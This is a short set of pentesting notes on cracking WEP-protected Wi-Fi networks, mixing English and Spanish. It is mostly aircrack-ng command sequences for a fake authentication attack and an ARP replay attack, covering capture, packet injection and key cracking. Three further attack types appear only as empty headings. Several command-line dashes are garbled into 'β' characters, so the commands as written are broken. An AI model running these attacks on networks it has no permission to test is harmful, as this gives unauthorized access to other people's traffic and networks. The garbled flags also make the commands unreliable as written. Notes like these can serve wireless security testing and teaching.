WEP
Less probabable to find it today but important to have notes about how to attack them.
Fake Authentication Attack
airmon-ng start wlan0
airodump-ng βc <Canal_AP> --bssid <BSSID> -w <nombreCaptura> wlan0mon
# Identificamos nuestra MAC
macchanger --show wlan0mon
aireplay-ng -1 0 -a <BSSID> -h <nuestraMAC> -e <ESSID> wlan0mon
aireplay-ng -2 βp 0841 βc FF:FF:FF:FF:FF:FF βb <BSSID> -h <nuestraMAC> wlan0mon
aircrack-ng βb <BSSID> <archivoPCAP>ARP Replay Attack
airmon-ng start wlan0
airodump-ng βc <Canal_AP> --bssid <BSSID> -w <nombreCaptura> wlan0mon
# Identificamos nuestra MAC
macchanger --show wlan0mon
aireplay-ng -3 βx 1000 βn 1000 βb <BSSID> -h <nuestraMAC> wlan0mon
aircrack-ng βb <BSSID> <archivoPCAP>Chop Chop Attack
Fragmentation Attack
SKA Type Cracking
Last updated
Was this helpful?